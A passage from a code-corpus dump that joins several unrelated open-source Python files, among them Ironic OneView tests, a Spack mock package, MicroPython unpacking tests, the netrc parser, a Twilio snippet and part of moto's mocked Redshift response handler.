driver_info = db_utils.get_test_oneview_driver_info()
properties = db_utils.get_test_oneview_properties()
properties["capabilities"] = (
"enclosure_group_uri:fake_eg_uri,"
"server_profile_template_uri:fake_spt_uri"
)
self.node.properties = properties
self.node.driver_info = driver_info
with self.assertRaisesRegex(exception.MissingParameterValue,
"server_hardware_type_uri"):
common.verify_node_info(self.node)
def test_get_oneview_info(self):
complete_node = self.node
expected_node_info = {
'server_hardware_uri': 'fake_sh_uri',
'server_hardware_type_uri': 'fake_sht_uri',
'enclosure_group_uri': 'fake_eg_uri',
'server_profile_template_uri': 'fake_spt_uri',
'applied_server_profile_uri': None,
}
self.assertEqual(
expected_node_info,
common.get_oneview_info(complete_node)
)
def test_get_oneview_info_missing_spt(self):
driver_info = db_utils.get_test_oneview_driver_info()
properties = db_utils.get_test_oneview_properties()
properties["capabilities"] = ("server_hardware_type_uri:fake_sht_uri,"
"enclosure_group_uri:fake_eg_uri")
self.node.driver_info = driver_info
self.node.properties = properties
incomplete_node = self.node
expected_node_info = {
'server_hardware_uri': 'fake_sh_uri',
'server_hardware_type_uri': 'fake_sht_uri',
'enclosure_group_uri': 'fake_eg_uri',
'server_profile_template_uri': None,
'applied_server_profile_uri': None,
}
self.assertEqual(
expected_node_info,
common.get_oneview_info(incomplete_node)
)
def test_get_oneview_info_missing_sh(self):
driver_info = db_utils.get_test_oneview_driver_info()
del driver_info["server_hardware_uri"]
properties = db_utils.get_test_oneview_properties()
properties["capabilities"] = (
"server_hardware_type_uri:fake_sht_uri,"
"enclosure_group_uri:fake_eg_uri,"
"server_profile_template_uri:fake_spt_uri"
)
self.node.driver_info = driver_info
self.node.properties = properties
incomplete_node = self.node
expected_node_info = {
'server_hardware_uri': None,
'server_hardware_type_uri': 'fake_sht_uri',
'enclosure_group_uri': 'fake_eg_uri',
'server_profile_template_uri': 'fake_spt_uri',
'applied_server_profile_uri': None,
}
self.assertEqual(
expected_node_info,
common.get_oneview_info(incomplete_node)
)
def test_get_oneview_info_malformed_capabilities(self):
driver_info = db_utils.get_test_oneview_driver_info()
del driver_info["server_hardware_uri"]
properties = db_utils.get_test_oneview_properties()
properties["capabilities"] = "anything,000"
self.node.driver_info = driver_info
self.node.properties = properties
self.assertRaises(exception.OneViewInvalidNodeParameter,
common.get_oneview_info,
self.node)
def test__verify_node_info(self):
common._verify_node_info("properties",
{"a": True,
"b": False,
"c": 0,
"d": "something",
"e": "somethingelse"},
["a", "b", "c", "e"])
def test__verify_node_info_fails(self):
self.assertRaises(
exception.MissingParameterValue,
common._verify_node_info,
"properties",
{"a": 1, "b": 2, "c": 3},
["x"]
)
def test__verify_node_info_missing_values_empty_string(self):
with self.assertRaisesRegex(exception.MissingParameterValue,
"'properties:a', 'properties:b'"):
common._verify_node_info("properties",
{"a": '', "b": None, "c": "something"},
["a", "b", "c"])
def _test_translate_oneview_states(self, power_state_to_translate,
expected_translated_power_state):
translated_power_state = common.translate_oneview_power_state(
power_state_to_translate)
self.assertEqual(translated_power_state,
expected_translated_power_state)
def test_all_scenarios_for_translate_oneview_states(self):
self._test_translate_oneview_states(
oneview_states.ONEVIEW_POWERING_OFF, states.POWER_ON)
self._test_translate_oneview_states(
oneview_states.ONEVIEW_POWER_OFF, states.POWER_OFF)
self._test_translate_oneview_states(
oneview_states.ONEVIEW_POWERING_ON, states.POWER_OFF)
self._test_translate_oneview_states(
oneview_states.ONEVIEW_RESETTING, states.REBOOT)
self._test_translate_oneview_states("anything", states.ERROR)
@mock.patch.object(common, 'get_oneview_client', spec_set=True,
autospec=True)
def test_validate_oneview_resources_compatibility(
self, mock_get_ov_client
):
oneview_client = mock_get_ov_client()
with task_manager.acquire(self.context, self.node.uuid) as task:
common.validate_oneview_resources_compatibility(oneview_client,
task)
self.assertTrue(
oneview_client.validate_node_server_hardware.called)
self.assertTrue(
oneview_client.validate_node_server_hardware_type.called)
self.assertTrue(
oneview_client.validate_node_enclosure_group.called)
self.assertTrue(
oneview_client.validate_node_server_profile_template.called)
self.assertTrue(
oneview_client.check_server_profile_is_applied.called)
self.assertTrue(
oneview_client.
is_node_port_mac_compatible_with_server_profile.called)
self.assertFalse(
oneview_client.
is_node_port_mac_compatible_with_server_hardware.called)
self.assertFalse(
oneview_client.validate_spt_primary_boot_connection.called)
self.assertFalse(
oneview_client.
validate_server_profile_template_mac_type.called)
@mock.patch.object(common, 'get_oneview_client', spec_set=True,
autospec=True)
def test_validate_oneview_resources_compatibility_dynamic_allocation(
self, mock_get_ov_client
):
"""Validate compatibility of resources for Dynamic Allocation model.
1) Set 'dynamic_allocation' flag as True on node's driver_info
2) Check validate_node_server_profile_template method is called
3) Check validate_node_server_hardware_type method is called
4) Check validate_node_enclosure_group method is called
5) Check validate_node_server_hardware method is called
6) Check is_node_port_mac_compatible_with_server_hardware method
is called
7) Check validate_server_profile_template_mac_type method is called
8) Check check_server_profile_is_applied method is not called
9) Check is_node_port_mac_compatible_with_server_profile method is
not called
"""
oneview_client = mock_get_ov_client()
with task_manager.acquire(self.context, self.node.uuid) as task:
driver_info = task.node.driver_info
driver_info['dynamic_allocation'] = True
task.node.driver_info = driver_info
common.validate_oneview_resources_compatibility(oneview_client,
task)
self.assertTrue(
oneview_client.validate_node_server_profile_template.called)
self.assertTrue(
oneview_client.validate_node_server_hardware_type.called)
self.assertTrue(
oneview_client.validate_node_enclosure_group.called)
self.assertTrue(
oneview_client.validate_node_server_hardware.called)
self.assertTrue(
oneview_client.
is_node_port_mac_compatible_with_server_hardware.called)
self.assertTrue(
oneview_client.
validate_server_profile_template_mac_type.called)
self.assertFalse(
oneview_client.check_server_profile_is_applied.called)
self.assertFalse(
oneview_client.
is_node_port_mac_compatible_with_server_profile.called)
def test_is_dynamic_allocation_enabled_boolean(self):
"""Ensure Dynamic Allocation is enabled when flag is True.
1) Set 'dynamic_allocation' flag as True on node's driver_info
2) Check Dynamic Allocation is enabled for the given node
"""
with task_manager.acquire(self.context, self.node.uuid) as task:
driver_info = task.node.driver_info
driver_info['dynamic_allocation'] = True
task.node.driver_info = driver_info
self.assertTrue(
common.is_dynamic_allocation_enabled(task.node)
)
def test_is_dynamic_allocation_enabled_string(self):
"""Ensure Dynamic Allocation is enabled when flag is 'True'.
1) Set 'dynamic_allocation' flag as True on node's driver_info
2) Check Dynamic Allocation is enabled for the given node
"""
with task_manager.acquire(self.context, self.node.uuid) as task:
driver_info = task.node.driver_info
driver_info['dynamic_allocation'] = 'True'
task.node.driver_info = driver_info
self.assertTrue(
common.is_dynamic_allocation_enabled(task.node)
)
def test_is_dynamic_allocation_enabled_false_boolean(self):
"""Ensure Dynamic Allocation is disabled when flag is False.
1) Set 'dynamic_allocation' flag as False on node's driver_info
2) Check Dynamic Allocation is disabled for the given node
"""
with task_manager.acquire(self.context, self.node.uuid) as task:
driver_info = task.node.driver_info
driver_info['dynamic_allocation'] = False
task.node.driver_info = driver_info
self.assertFalse(
common.is_dynamic_allocation_enabled(task.node)
)
def test_is_dynamic_allocation_enabled_false_string(self):
"""Ensure Dynamic Allocation is disabled when flag is 'False'.
1) Set 'dynamic_allocation' flag as False on node's driver_info
2) Check Dynamic Allocation is disabled for the given node
"""
with task_manager.acquire(self.context, self.node.uuid) as task:
driver_info = task.node.driver_info
driver_info['dynamic_allocation'] = 'False'
task.node.driver_info = driver_info
self.assertFalse(
common.is_dynamic_allocation_enabled(task.node)
)
def test_is_dynamic_allocation_enabled_none_object(self):
"""Ensure Dynamic Allocation is disabled when flag is None.
1) Set 'dynamic_allocation' flag as None on node's driver_info
2) Check Dynamic Allocation is disabled for the given node
"""
with task_manager.acquire(self.context, self.node.uuid) as task:
driver_info = task.node.driver_info
driver_info['dynamic_allocation'] = None
task.node.driver_info = driver_info
self.assertFalse(
common.is_dynamic_allocation_enabled(task.node)
)
def test_is_dynamic_allocation_enabled_without_flag(self):
"""Ensure Dynamic Allocation is disabled when node doesn't have flag.
1) Create a node without 'dynamic_allocation' flag
2) Check Dynamic Allocation is disabled for the given node
"""
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertFalse(
common.is_dynamic_allocation_enabled(task.node)
)
def test_is_dynamic_allocation_enabled_with_invalid_value_for_flag(self):
"""Ensure raises an InvalidParameterValue when flag is invalid.
1) Create a node with an invalid value for 'dynamic_allocation' flag
2) Check if method raises an InvalidParameterValue for the given node
"""
with task_manager.acquire(self.context, self.node.uuid) as task:
driver_info = task.node.driver_info
driver_info['dynamic_allocation'] = 'invalid flag'
task.node.driver_info = driver_info
self.assertRaises(
exception.InvalidParameterValue,
common.is_dynamic_allocation_enabled,
task.node
)
| NaohiroTamura/ironic | ironic/tests/unit/drivers/modules/oneview/test_common.py | Python | apache-2.0 | 17,276 |
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class ConflictParent(Package):
homepage = 'https://github.com/tgamblin/callpath'
url = 'http://github.com/tgamblin/callpath-1.0.tar.gz'
version(0.8, 'foobarbaz')
version(0.9, 'foobarbaz')
version(1.0, 'foobarbaz')
depends_on('conflict')
conflicts('^conflict~foo', when='@0.9')
def install(self, spec, prefix):
configure("--prefix=%s" % prefix)
make()
make("install")
def setup_environment(self, senv, renv):
renv.set('FOOBAR', self.name)
| iulian787/spack | var/spack/repos/builtin.mock/packages/conflict-parent/package.py | Python | lgpl-2.1 | 731 |
from pyblish import api
from pyblish_bumpybox import inventory
class ValidateGroupNode(api.InstancePlugin):
"""Validates group node.
Ensures none of the groups content is locally stored.
"""
order = inventory.get_order(__file__, "ValidateGroupNode")
optional = True
families = ["gizmo", "lut"]
label = "Group Node"
hosts = ["nuke", "nukeassist"]
def process(self, instance):
import os
for node in instance[0].nodes():
# Skip input and output nodes
if node.Class() in ["Input", "Output"]:
continue
# Get file path
file_path = ""
if node.Class() == "Vectorfield":
file_path = node["vfield_file"].getValue()
if node.Class() == "Read":
file_path = node["file"].getValue()
            # Validate that the file path is not stored locally
            # (Windows specific)
msg = "Node \"{0}\" in group \"{1}\"".format(
node["name"].getValue(), instance[0]["name"].getValue()
)
msg += ", has a local file path: \"{0}\"".format(file_path)
assert "c:" != os.path.splitdrive(file_path)[0].lower(), msg
| Bumpybox/pyblish-bumpybox | pyblish_bumpybox/plugins/nuke/validate_group_node.py | Python | lgpl-3.0 | 1,217 |
# unpack sequences
a, = 1, ; print(a)
a, b = 2, 3 ; print(a, b)
a, b, c = 1, 2, 3; print(a, b, c)
a, = range(1); print(a)
a, b = range(2); print(a, b)
a, b, c = range(3); print(a, b, c)
(a) = range(1); print(a)
(a,) = range(1); print(a)
(a, b) = range(2); print(a, b)
(a, b, c) = range(3); print(a, b, c)
(a, (b, c)) = [-1, range(2)]; print(a, b, c)
# lists
[] = []
[a] = range(1); print(a)
[a, b] = range(2); print(a, b)
[a, b, c] = range(3); print(a, b, c)
# with star
*a, = () ; print(a)
*a, = 4, ; print(a)
*a, = 5, 6 ; print(a)
*a, b = 7, ; print(a, b)
*a, b = 8, 9 ; print(a, b)
*a, b = 10, 11, 12 ; print(a, b)
a, *b = 13, ; print(a, b)
a, *b = 14, 15 ; print(a, b)
a, *b = 16, 17, 18 ; print(a, b)
a, *b, c = 19, 20 ; print(a, b)
a, *b, c = 21, 22, 23 ; print(a, b)
a, *b, c = 24, 25, 26, 27 ; print(a, b)
a = [28, 29]
*b, = a
print(a, b, a == b)
[*a] = [1, 2, 3]
print(a)
try:
a, *b, c = (30,)
except ValueError:
print("ValueError")
# with star and generic iterator
*a, = range(5) ; print(a)
*a, b = range(5) ; print(a, b)
*a, b, c = range(5) ; print(a, b, c)
a, *b = range(5) ; print(a, b)
a, *b, c = range(5) ; print(a, b, c)
a, *b, c, d = range(5) ; print(a, b, c, d)
a, b, *c = range(5) ; print(a, b, c)
a, b, *c, d = range(5) ; print(a, b, c, d)
a, b, *c, d, e = range(5) ; print(a, b, c, d, e)
*a, = [x * 2 for x in [1, 2, 3, 4]] ; print(a)
*a, b = [x * 2 for x in [1, 2, 3, 4]] ; print(a, b)
a, *b = [x * 2 for x in [1, 2, 3, 4]] ; print(a, b)
a, *b, c = [x * 2 for x in [1, 2, 3, 4]]; print(a, b, c)
try:
a, *b, c = range(0)
except ValueError:
print("ValueError")
try:
a, *b, c = range(1)
except ValueError:
print("ValueError")
| mhoffma/micropython | tests/basics/unpack1.py | Python | mit | 1,794 |
"""An object-oriented interface to .netrc files."""
# Module and documentation by Eric S. Raymond, 21 Dec 1998
import os, shlex, stat
__all__ = ["netrc", "NetrcParseError"]
class NetrcParseError(Exception):
"""Exception raised on syntax errors in the .netrc file."""
def __init__(self, msg, filename=None, lineno=None):
self.filename = filename
self.lineno = lineno
self.msg = msg
Exception.__init__(self, msg)
def __str__(self):
return "%s (%s, line %s)" % (self.msg, self.filename, self.lineno)
class netrc:
def __init__(self, file=None):
default_netrc = file is None
if file is None:
try:
file = os.path.join(os.environ['HOME'], ".netrc")
except KeyError:
raise OSError("Could not find .netrc: $HOME is not set")
self.hosts = {}
self.macros = {}
with open(file) as fp:
self._parse(file, fp, default_netrc)
def _parse(self, file, fp, default_netrc):
lexer = shlex.shlex(fp)
lexer.wordchars += r"""!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"""
lexer.commenters = lexer.commenters.replace('#', '')
while 1:
# Look for a machine, default, or macdef top-level keyword
saved_lineno = lexer.lineno
toplevel = tt = lexer.get_token()
if not tt:
break
elif tt[0] == '#':
if lexer.lineno == saved_lineno and len(tt) == 1:
lexer.instream.readline()
continue
elif tt == 'machine':
entryname = lexer.get_token()
elif tt == 'default':
entryname = 'default'
elif tt == 'macdef': # Just skip to end of macdefs
entryname = lexer.get_token()
self.macros[entryname] = []
lexer.whitespace = ' \t'
while 1:
line = lexer.instream.readline()
if not line or line == '\012':
lexer.whitespace = ' \t\r\n'
break
self.macros[entryname].append(line)
continue
else:
raise NetrcParseError(
"bad toplevel token %r" % tt, file, lexer.lineno)
# We're looking at start of an entry for a named machine or default.
login = ''
account = password = None
self.hosts[entryname] = {}
while 1:
tt = lexer.get_token()
if (tt.startswith('#') or
tt in {'', 'machine', 'default', 'macdef'}):
if password:
self.hosts[entryname] = (login, account, password)
lexer.push_token(tt)
break
else:
raise NetrcParseError(
"malformed %s entry %s terminated by %s"
% (toplevel, entryname, repr(tt)),
file, lexer.lineno)
elif tt == 'login' or tt == 'user':
login = lexer.get_token()
elif tt == 'account':
account = lexer.get_token()
elif tt == 'password':
if os.name == 'posix' and default_netrc:
prop = os.fstat(fp.fileno())
if prop.st_uid != os.getuid():
import pwd
try:
fowner = pwd.getpwuid(prop.st_uid)[0]
except KeyError:
fowner = 'uid %s' % prop.st_uid
try:
user = pwd.getpwuid(os.getuid())[0]
except KeyError:
user = 'uid %s' % os.getuid()
raise NetrcParseError(
("~/.netrc file owner (%s) does not match"
" current user (%s)") % (fowner, user),
file, lexer.lineno)
if (prop.st_mode & (stat.S_IRWXG | stat.S_IRWXO)):
raise NetrcParseError(
"~/.netrc access too permissive: access"
" permissions must restrict access to only"
" the owner", file, lexer.lineno)
password = lexer.get_token()
else:
raise NetrcParseError("bad follower token %r" % tt,
file, lexer.lineno)
def authenticators(self, host):
"""Return a (user, account, password) tuple for given host."""
if host in self.hosts:
return self.hosts[host]
elif 'default' in self.hosts:
return self.hosts['default']
else:
return None
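    # Illustrative usage (not part of the original module; host and returned
    # values are made up for the example):
    # >>> netrc().authenticators('ftp.example.com')
    # ('anonymous', None, 'guest')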
def __repr__(self):
"""Dump the class data in the format of a .netrc file."""
rep = ""
for host in self.hosts.keys():
attrs = self.hosts[host]
rep = rep + "machine "+ host + "\n\tlogin " + repr(attrs[0]) + "\n"
if attrs[1]:
rep = rep + "account " + repr(attrs[1])
rep = rep + "\tpassword " + repr(attrs[2]) + "\n"
for macro in self.macros.keys():
rep = rep + "macdef " + macro + "\n"
for line in self.macros[macro]:
rep = rep + line
rep = rep + "\n"
return rep
if __name__ == '__main__':
print(netrc())
| Orav/kbengine | kbe/src/lib/python/Lib/netrc.py | Python | lgpl-3.0 | 5,890 |
# Download the Python helper library from twilio.com/docs/python/install
from twilio.rest import Client
# Your Account Sid and Auth Token from twilio.com/user/account
account_sid = "ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
auth_token = "your_auth_token"
client = Client(account_sid, auth_token)
map_instance = client.sync \
.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.sync_maps("Players") \
.fetch()
print(map_instance.sid)
| teoreteetik/api-snippets | sync/rest/maps/retrieve-map/retrieve-map.6.x.py | Python | mit | 441 |
#!/usr/bin/env python
import argparse
import codecs
import logging
from collections import Counter
import unicodecsv as csv
import epitran
import epitran.flite
import panphon
logger = logging.getLogger('epitran')
def normpunc(flite, s):
def norm(c):
if c in flite.puncnorm:
return flite.puncnorm[c]
else:
return c
return ''.join(map(norm, s))
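# add_record: normalize punctuation, transliterate the orthographic form with
# Flite, then greedily count the longest single-segment prefixes of the
# transliteration (falling back to single characters) to build the segment space.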
def add_record(flite, ft, orth):
space = Counter()
orth = normpunc(flite, orth)
trans = flite.transliterate(orth)
while trans:
pref = ft.longest_one_seg_prefix(trans)
if pref != '':
space[pref] += 1
trans = trans[len(pref):]
else:
if trans[0] in flite.puncnorm_vals:
space[trans[0]] += 1
else:
space[trans[0]] += 1
trans = trans[1:]
return space
def add_file(flite, ft, fn):
space = Counter()
with codecs.open(fn, 'r', 'utf-8') as f:
for line in f:
fields = line.split(u'\t')
if len(fields) > 0:
orth = fields[0]
space.update(add_record(flite, ft, orth))
logger.debug(u'Length of counter:\t{}'.format(len(space)))
return space
def print_space(output, space):
pairs = enumerate(sorted(filter(lambda x: x, space.keys())))
with open(output, 'wb') as f:
writer = csv.writer(f, encoding='utf-8')
for i, char in pairs:
writer.writerow((i, char))
def main(infiles, output):
flite = epitran.flite.Flite()
ft = panphon.FeatureTable()
space = Counter()
for fn in infiles:
logger.debug(u'Scanning:\t{}'.format(fn).encode('utf-8'))
space.update(add_file(flite, ft, fn))
print_space(output, space)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-o', '--output', help='Output file.')
parser.add_argument('infiles', nargs='+', help='CONLL files serving as basis for segment space.')
args = parser.parse_args()
main(args.infiles, args.output)
| dmort27/epitran | epitran/bin/connl2engipaspace.py | Python | mit | 2,078 |
from rest_framework.serializers import SerializerMethodField
from mkt.collections.serializers import (CollectionSerializer,
CollectionMembershipField)
from mkt.search.serializers import SimpleESAppSerializer
from mkt.webapps.serializers import SimpleAppSerializer
class BaseFireplaceAppSerializer(object):
def get_icons(self, app):
# Fireplace only requires 64px-sized icons.
return {64: app.get_icon_url(64)}
class FireplaceAppSerializer(BaseFireplaceAppSerializer, SimpleAppSerializer):
class Meta(SimpleAppSerializer.Meta):
fields = ['author', 'banner_message', 'banner_regions', 'categories',
'content_ratings', 'current_version', 'description',
'device_types', 'homepage', 'icons', 'id', 'is_packaged',
'manifest_url', 'name', 'payment_required', 'premium_type',
'previews', 'price', 'price_locale', 'privacy_policy',
'public_stats', 'release_notes', 'ratings', 'slug', 'status',
'support_email', 'support_url', 'upsell', 'user']
exclude = []
class FireplaceESAppSerializer(BaseFireplaceAppSerializer,
SimpleESAppSerializer):
weight = SerializerMethodField('get_weight')
class Meta(SimpleESAppSerializer.Meta):
fields = sorted(FireplaceAppSerializer.Meta.fields + ['weight'])
exclude = FireplaceAppSerializer.Meta.exclude
def get_weight(self, obj):
return obj.es_data.get('weight', 1)
def get_user_info(self, app):
# Fireplace search should always be anonymous for extra-cacheability.
return None
class FireplaceCollectionMembershipField(CollectionMembershipField):
app_serializer_classes = {
'es': FireplaceESAppSerializer,
'normal': FireplaceAppSerializer,
}
class FireplaceCollectionSerializer(CollectionSerializer):
apps = FireplaceCollectionMembershipField(many=True, source='apps')
| jinankjain/zamboni | mkt/fireplace/serializers.py | Python | bsd-3-clause | 2,011 |
from __future__ import unicode_literals
import json
import xmltodict
from jinja2 import Template
from six import iteritems
from moto.core.responses import BaseResponse
from .models import redshift_backends
def convert_json_error_to_xml(json_error):
error = json.loads(json_error)
code = error["Error"]["Code"]
message = error["Error"]["Message"]
template = Template(
"""
<RedshiftClientError>
<Error>
<Code>{{ code }}</Code>
<Message>{{ message }}</Message>
<Type>Sender</Type>
</Error>
<RequestId>6876f774-7273-11e4-85dc-39e55ca848d1</RequestId>
</RedshiftClientError>"""
)
return template.render(code=code, message=message)
def itemize(data):
"""
The xmltodict.unparse requires we modify the shape of the input dictionary slightly. Instead of a dict of the form:
{'key': ['value1', 'value2']}
We must provide:
{'key': {'item': ['value1', 'value2']}}
"""
if isinstance(data, dict):
ret = {}
for key in data:
ret[key] = itemize(data[key])
return ret
elif isinstance(data, list):
return {"item": [itemize(value) for value in data]}
else:
return data
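# Illustrative example (not part of the original module):
# >>> itemize({'Clusters': [{'Name': 'a'}, {'Name': 'b'}]})
# {'Clusters': {'item': [{'Name': 'a'}, {'Name': 'b'}]}}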
class RedshiftResponse(BaseResponse):
@property
def redshift_backend(self):
return redshift_backends[self.region]
def get_response(self, response):
if self.request_json:
return json.dumps(response)
else:
xml = xmltodict.unparse(itemize(response), full_document=False)
if hasattr(xml, "decode"):
xml = xml.decode("utf-8")
return xml
def call_action(self):
status, headers, body = super(RedshiftResponse, self).call_action()
if status >= 400 and not self.request_json:
body = convert_json_error_to_xml(body)
return status, headers, body
def unpack_complex_list_params(self, label, names):
unpacked_list = list()
count = 1
while self._get_param("{0}.{1}.{2}".format(label, count, names[0])):
param = dict()
for i in range(len(names)):
param[names[i]] = self._get_param(
"{0}.{1}.{2}".format(label, count, names[i])
)
unpacked_list.append(param)
count += 1
return unpacked_list
def unpack_list_params(self, label):
unpacked_list = list()
count = 1
while self._get_param("{0}.{1}".format(label, count)):
unpacked_list.append(self._get_param("{0}.{1}".format(label, count)))
count += 1
return unpacked_list
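    # Both helpers above read AWS-style indexed query parameters, e.g.
    # "Tags.Tag.1.Key" / "Tags.Tag.1.Value" for complex lists and
    # "TagKeys.TagKey.1" for plain lists, stopping at the first missing index.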
def _get_cluster_security_groups(self):
cluster_security_groups = self._get_multi_param("ClusterSecurityGroups.member")
if not cluster_security_groups:
cluster_security_groups = self._get_multi_param(
"ClusterSecurityGroups.ClusterSecurityGroupName"
)
return cluster_security_groups
def _get_vpc_security_group_ids(self):
vpc_security_group_ids = self._get_multi_param("VpcSecurityGroupIds.member")
if not vpc_security_group_ids:
vpc_security_group_ids = self._get_multi_param(
"VpcSecurityGroupIds.VpcSecurityGroupId"
)
return vpc_security_group_ids
def _get_iam_roles(self):
iam_roles = self._get_multi_param("IamRoles.member")
if not iam_roles:
iam_roles = self._get_multi_param("IamRoles.IamRoleArn")
return iam_roles
def _get_subnet_ids(self):
subnet_ids = self._get_multi_param("SubnetIds.member")
if not subnet_ids:
subnet_ids = self._get_multi_param("SubnetIds.SubnetIdentifier")
return subnet_ids
def create_cluster(self):
cluster_kwargs = {
"cluster_identifier": self._get_param("ClusterIdentifier"),
"node_type": self._get_param("NodeType"),
"master_username": self._get_param("MasterUsername"),
"master_user_password": self._get_param("MasterUserPassword"),
"db_name": self._get_param("DBName"),
"cluster_type": self._get_param("ClusterType"),
"cluster_security_groups": self._get_cluster_security_groups(),
"vpc_security_group_ids": self._get_vpc_security_group_ids(),
"cluster_subnet_group_name": self._get_param("ClusterSubnetGroupName"),
"availability_zone": self._get_param("AvailabilityZone"),
"preferred_maintenance_window": self._get_param(
"PreferredMaintenanceWindow"
),
"cluster_parameter_group_name": self._get_param(
"ClusterParameterGroupName"
),
"automated_snapshot_retention_period": self._get_int_param(
"AutomatedSnapshotRetentionPeriod"
),
"port": self._get_int_param("Port"),
"cluster_version": self._get_param("ClusterVersion"),
"allow_version_upgrade": self._get_bool_param("AllowVersionUpgrade"),
"number_of_nodes": self._get_int_param("NumberOfNodes"),
"publicly_accessible": self._get_param("PubliclyAccessible"),
"encrypted": self._get_param("Encrypted"),
"region_name": self.region,
"tags": self.unpack_complex_list_params("Tags.Tag", ("Key", "Value")),
"iam_roles_arn": self._get_iam_roles(),
"enhanced_vpc_routing": self._get_param("EnhancedVpcRouting"),
"kms_key_id": self._get_param("KmsKeyId"),
}
cluster = self.redshift_backend.create_cluster(**cluster_kwargs).to_json()
cluster["ClusterStatus"] = "creating"
return self.get_response(
{
"CreateClusterResponse": {
"CreateClusterResult": {"Cluster": cluster},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def restore_from_cluster_snapshot(self):
enhanced_vpc_routing = self._get_bool_param("EnhancedVpcRouting")
restore_kwargs = {
"snapshot_identifier": self._get_param("SnapshotIdentifier"),
"cluster_identifier": self._get_param("ClusterIdentifier"),
"port": self._get_int_param("Port"),
"availability_zone": self._get_param("AvailabilityZone"),
"allow_version_upgrade": self._get_bool_param("AllowVersionUpgrade"),
"cluster_subnet_group_name": self._get_param("ClusterSubnetGroupName"),
"publicly_accessible": self._get_param("PubliclyAccessible"),
"cluster_parameter_group_name": self._get_param(
"ClusterParameterGroupName"
),
"cluster_security_groups": self._get_cluster_security_groups(),
"vpc_security_group_ids": self._get_vpc_security_group_ids(),
"preferred_maintenance_window": self._get_param(
"PreferredMaintenanceWindow"
),
"automated_snapshot_retention_period": self._get_int_param(
"AutomatedSnapshotRetentionPeriod"
),
"region_name": self.region,
"iam_roles_arn": self._get_iam_roles(),
}
if enhanced_vpc_routing is not None:
restore_kwargs["enhanced_vpc_routing"] = enhanced_vpc_routing
cluster = self.redshift_backend.restore_from_cluster_snapshot(
**restore_kwargs
).to_json()
cluster["ClusterStatus"] = "creating"
return self.get_response(
{
"RestoreFromClusterSnapshotResponse": {
"RestoreFromClusterSnapshotResult": {"Cluster": cluster},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def describe_clusters(self):
cluster_identifier = self._get_param("ClusterIdentifier")
clusters = self.redshift_backend.describe_clusters(cluster_identifier)
return self.get_response(
{
"DescribeClustersResponse": {
"DescribeClustersResult": {
"Clusters": [cluster.to_json() for cluster in clusters]
},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def modify_cluster(self):
request_kwargs = {
"cluster_identifier": self._get_param("ClusterIdentifier"),
"new_cluster_identifier": self._get_param("NewClusterIdentifier"),
"node_type": self._get_param("NodeType"),
"master_user_password": self._get_param("MasterUserPassword"),
"cluster_type": self._get_param("ClusterType"),
"cluster_security_groups": self._get_cluster_security_groups(),
"vpc_security_group_ids": self._get_vpc_security_group_ids(),
"cluster_subnet_group_name": self._get_param("ClusterSubnetGroupName"),
"preferred_maintenance_window": self._get_param(
"PreferredMaintenanceWindow"
),
"cluster_parameter_group_name": self._get_param(
"ClusterParameterGroupName"
),
"automated_snapshot_retention_period": self._get_int_param(
"AutomatedSnapshotRetentionPeriod"
),
"cluster_version": self._get_param("ClusterVersion"),
"allow_version_upgrade": self._get_bool_param("AllowVersionUpgrade"),
"number_of_nodes": self._get_int_param("NumberOfNodes"),
"publicly_accessible": self._get_param("PubliclyAccessible"),
"encrypted": self._get_param("Encrypted"),
"iam_roles_arn": self._get_iam_roles(),
"enhanced_vpc_routing": self._get_param("EnhancedVpcRouting"),
}
cluster_kwargs = {}
# We only want parameters that were actually passed in, otherwise
# we'll stomp all over our cluster metadata with None values.
for (key, value) in iteritems(request_kwargs):
if value is not None and value != []:
cluster_kwargs[key] = value
cluster = self.redshift_backend.modify_cluster(**cluster_kwargs)
return self.get_response(
{
"ModifyClusterResponse": {
"ModifyClusterResult": {"Cluster": cluster.to_json()},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def delete_cluster(self):
request_kwargs = {
"cluster_identifier": self._get_param("ClusterIdentifier"),
"final_cluster_snapshot_identifier": self._get_param(
"FinalClusterSnapshotIdentifier"
),
"skip_final_snapshot": self._get_bool_param("SkipFinalClusterSnapshot"),
}
cluster = self.redshift_backend.delete_cluster(**request_kwargs)
return self.get_response(
{
"DeleteClusterResponse": {
"DeleteClusterResult": {"Cluster": cluster.to_json()},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def create_cluster_subnet_group(self):
cluster_subnet_group_name = self._get_param("ClusterSubnetGroupName")
description = self._get_param("Description")
subnet_ids = self._get_subnet_ids()
tags = self.unpack_complex_list_params("Tags.Tag", ("Key", "Value"))
subnet_group = self.redshift_backend.create_cluster_subnet_group(
cluster_subnet_group_name=cluster_subnet_group_name,
description=description,
subnet_ids=subnet_ids,
region_name=self.region,
tags=tags,
)
return self.get_response(
{
"CreateClusterSubnetGroupResponse": {
"CreateClusterSubnetGroupResult": {
"ClusterSubnetGroup": subnet_group.to_json()
},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def describe_cluster_subnet_groups(self):
subnet_identifier = self._get_param("ClusterSubnetGroupName")
subnet_groups = self.redshift_backend.describe_cluster_subnet_groups(
subnet_identifier
)
return self.get_response(
{
"DescribeClusterSubnetGroupsResponse": {
"DescribeClusterSubnetGroupsResult": {
"ClusterSubnetGroups": [
subnet_group.to_json() for subnet_group in subnet_groups
]
},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def delete_cluster_subnet_group(self):
subnet_identifier = self._get_param("ClusterSubnetGroupName")
self.redshift_backend.delete_cluster_subnet_group(subnet_identifier)
return self.get_response(
{
"DeleteClusterSubnetGroupResponse": {
"ResponseMetadata": {
